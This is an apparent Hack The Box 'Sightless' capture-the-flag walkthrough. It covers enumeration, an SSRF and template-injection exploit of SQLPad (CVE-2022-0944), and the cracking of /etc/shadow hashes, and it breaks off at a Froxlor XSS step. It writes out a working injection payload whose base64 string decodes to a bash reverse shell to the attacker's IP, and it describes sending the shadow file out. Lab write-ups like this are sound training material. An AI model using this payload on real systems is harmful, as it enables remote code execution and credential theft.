HTB: Sightless Walkthrough

Overview

Difficulty: Easy
- Operating System: Linux
- Objective: Understand potential breaking points in sightless machine.
- Tools Used: Nmap, SSH, FTP, Burpsuite, Hashcat, John The Ripper, FoxyProxy, nc, Gobuster, curl, filezilla, keep2john, kpcli, dos2unix

If you’re unable to view it fully due to Medium Subscriptions, you can view it at https://araizhacks.blogspot.com/2025/01/htb-cap-walkthrough.html

I tend to start enumerating as much basic information as I need before delving deeper.

Performing Nmap Scans

As usual the very first step is to figure out what ports and hence what services are actually open. This will set the stage for how we will try to break in.
Let’s start with a stealth scan with disabled arp pings to figure out what ports are open:

It is clear that the following ports are open:
- 21 ~ FTP
- 22 ~ SSH
- 80 ~ HTTP

Now, let’s move further and scan for service versions and run the default scripts on these three ports:

From this I interpreted the following information:
- FTP runs on 21 exposing a ProFTPD server whose hostname is sightless.htb
- SSH runs on 22 exposing an Ubuntu OS in use
- HTTP runs on 80 exposing a Nginx server, confirms the use of Ubuntu and hints to presence of a webpage.

Let’s move on to grabbing banners to see if something comes up.

Banner Grabbing

Let’s call back for some banners, you never know they sometimes come back with some really important information and confirm service versions used.

Starting with FTP:

Next, with SSH:

Finally, for HTTP first I used nc but did not come back with anything, so I use curl with the -IL flag where -I fetches only the HTTP Headers and -L allows curl to redirect if returned with say The website has been redirected to x.

Confirms all data from the Nmap scans.
Apart from that nothing very special.

Gobuster Directory Enumeration

Next up, I did some gobuster enumeration.
First, I used the text file from secslist called common.txt as:

Secondly, I used another text file called directory-list-lowercase-2.3-small.txt:

At this point, enough basic scanning is complete and I will now move on towards browsing to sightless.htb to discover what else catches the eyes.

Wappalyzer Information

Let’s finally wrap up with getting a glimpse of what web technologies this webpage is working on:

(Don’t have it? Just search for `wappalyzer <your-browser> plugin` and enable the plugin on the page you wish to scan)

Browsing

Upon initial search, the source code is also nothing special.
However, on the website there are two specific buttons of much interest:

The first button leads to SQLPad which looks like a SQL IDE of some sorts. While, the second takes you to Froxlor homepage.

Teasing around SQLPad

And just before we move on, also save this URL in your /etc/hosts cause otherwise it might not open:

Let’s create a new connection using the MYSQL driver and let’s just name it as TEST-CONNECTION. Before we do anything let’s run a server at 4444 and see whether the target connects back to us:

Now, go to the sqlpad page again and insert your as in you the attackers IP and port on which the nc is running (find IP using ifconfig TUN interface):

Now, if we click on Test, and go back to our server.

Bang! We have a connection! This means SSRF or Server Side Request Forgery vulnerability is present.

Now, i’m going to go directly for trying to exploit it.

Searching for Exploits

Let’s go ahead and search for exploits.
First a quick check of the server version:

I now simply searched for SQLPad 6.10.0 exploit and hit this NIST page https://nvd.nist.gov/vuln/detail/CVE-2022-0944 which seems like CVE-2022–0944.
Then forwarded to this page which was available on NIST:

It should look something like this at https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb:

Gaining Reverse Shell

Carefully reading the exploit, it says that it is a Template Injection vulnerability which usually involves a misconfigured database input which is not cross checked/validated and can lead to a RCE.

The next steps are clear:

I first crafted the reverse shell code that needs to be executed:

This I will decode in the target machine and run via bash which will create the reverse shell.
I just need to do two things now:
1. Create the rev shell server on my machine
2. Modify the exploit code
3. Upload the code

Let’s first create the server:

Next, let’s create the final exploit code:

Now, go to SQLPad sightless.htb page and enter:
- IP — 10.10.14.191
- Database — {{ process.mainModule.require(‘child_process’).exec(‘echo YmFzaCAtaSAmPiAvZGV2L3RjcC8xMC4xMC4xNC4xOTEvNDQ0NCAwPiYx | base64 -d | bash’) }}

And, bingo! You get root access!

Browsing for Credentials

Once in, it is visible that we are logged on as root.
So, let’s make use of our privs. I will cat /etc/passwd and /etc/shadow back to my machine.
First, start a local machine at port 5555 (choose any port you may like).
Then,

Now, you should have both of these locally:

Upon closer look at /etc/shadow:

Bingo! We have hashed passwords of root and michael.
Copy and paste both these into separate files so we can work towards getting the passwords.
Let’s work on root first:

Now, for michael:

We now have passwords for both:

Let’s quickly login as michael and check for the user flag:

Checking the contents:

There is the user flag.
The same however does not work for root, so we’ve got to search for other ways.

Searching for Root Flag

Upon checking for listening ports, it is listening on 127.0.0.1:8080.

Now, upon visiting:

Let’s look for some vulnerabilities that affect froxlor.
You’ll eventually find a page https://github.com/froxlor/Froxlor/security/advisories/GHSA-x525-54hf-xr53 which has a payload that affects a XSS vulnerability.

So, accroding to the CVE we need to login with fake creds and then upload the payload.
But first, lets format the payload a bit.
Go to `burpsuite > decoder`: